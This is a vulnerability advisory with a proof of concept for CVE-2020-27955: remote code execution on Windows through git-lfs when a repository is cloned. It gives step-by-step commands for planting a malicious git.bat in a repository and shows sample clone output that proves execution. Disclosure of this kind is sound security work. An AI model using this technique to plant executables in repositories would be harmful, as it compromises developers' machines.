===========================================
- Discovered by: Dawid Golunski (@dawid_golunski)
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://exploitbox.io
- CVE-2020-27955
- Release date: 04.11.2020
- Revision 1.0
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
Gita <= 2.29.2 - Remote Code Execution (RCE) via git-lfs
II. BACKGROUND
-------------------------
Git
"Git is a free and open source distributed version control system designed to
handle everything from small to very large projects with speed and efficiency.
https://git-scm.com/
--
Git LFS
"An open source Git extension for versioning large files
Git Large File Storage (LFS) replaces large files such as audio samples,
videos, datasets, and graphics with text pointers inside Git, while
storing the file contents on a remote server like GitHub.com or GitHub
Enterprise."
https://git-lfs.github.com/
III. INTRODUCTION
-------------------------
Git in versions <= 2.29.2 includes git-lfs extension which allows remote
attackers to execute arbitrary code on the victim's Windows system upon a
clone operation.
IV. DESCRIPTION
-------------------------
Due to the vulnerability in git-lfs described at:
Git-LFS <= 2.12 RCE Exploit
Attackers may be able to plant a backdoor in the root directory of a malicious
repository by simply adding an executable file named as:
- git.bat
- git.exe
- git.cmd
- git.vbs
or any other executable extension available on the target Windows system
(PATHEXT environment variable dependent).
As a result, the malicious git binary will get executed automatically
instead of the original git binary located in a trusted path.
V. PROOF OF CONCEPT
-------------------------
A git-lfs PoC exploit for git may be prepared with the following steps:
Attacker:
On a separate linux system (to prevent execution on the localhost on commit):
1. Create a new repository:
mkdir git-lfs-RCE-exploit
cd git-lfs-RCE-exploit
git init
2. Prepare a malicious executable. E.g: git.bat with the following contents:
@echo hacked > GITHACKED
3. Add the executable to the repository:
git add git.bat
4. Add LFS file entries to the repository. This is necessary to trigger
the vulnerable git-lfs extension when the repository is cloned and processed
by the main git process.
git lfs track "*.dat"
git add .gitattributes
echo "git exploit PoC" > big-bug-lfs-file.dat
git add big-bug-lfs-file.dat
5. Commit both the exploit and the lfs files:
git commit -a -m "Big Data, powered by Git LFS & the git-lfs exploit"
6. Push the changes to the repository:
git remote add origin https://github.com/some-user-name/lfspoc
git push -u origin master
Victim:
On windows, run powershell.exe shell and clone the PoC repo:
git clone https://github.com/some-user-name/lfspoc .
At this point the malicious executable (git.bat) will be downloaded into the repo's directory
and automatically executed by the git-lfs extension without any user interaction.
As a result, 'GITHACKED' file should appear in the repo's directory
To check, type:
dir
Alternatively, a demo repository with a plain-text bat file located at
https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git
can be used as follows:
C:\Users\victim> git clone https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git .
Cloning into '.'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 24 (delta 5), reused 17 (delta 1), pack-reused 0
Receiving objects: 100% (24/24), done.
Resolving deltas: 100% (5/5), done.
...
C:\Users\victim> type GITHACKED
hacked